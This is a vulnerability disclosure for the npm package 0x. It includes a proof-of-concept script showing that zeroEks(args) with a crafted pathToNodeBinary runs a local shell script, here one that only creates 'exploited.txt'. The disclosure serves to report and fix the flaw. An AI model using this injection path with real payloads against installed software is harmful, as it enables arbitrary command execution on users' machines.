Package 0x: Affected versions of this package are vulnerable to code injection. Calling zeroEks(args) will execute a local file local-touch.sh (via lib/v8-log-to-ticks.js#74) which may run arbitrary commands. This requires the presence of additional files which can be empty.

0x_poc.js

const zeroEks = require('0x');

var args = {
    pathToNodeBinary: "./local-touch.sh",
    visualizeOnly: "./",
    v: true
}

/*
 * For this to work, the following files with specific names must be present
 * to pass through certain regex points in the 0x package execution flow:
 * - isolate-0xaBDcEEd-5671283554685763082363172-133712419908-v8.log
 * - statcks.5.out 
 * This example will call 'local-touch.sh' which will have been created beforehand.
 * A local 'exploited.txt' file will be created.
 */
zeroEks(args)

isolate-0xaBDcEEd-5671283554685763082363172-133712419908-v8.log

//empty

local-touch.sh

#!/bin/bash

touch "exploited.txt"

statcks.5.out

//empty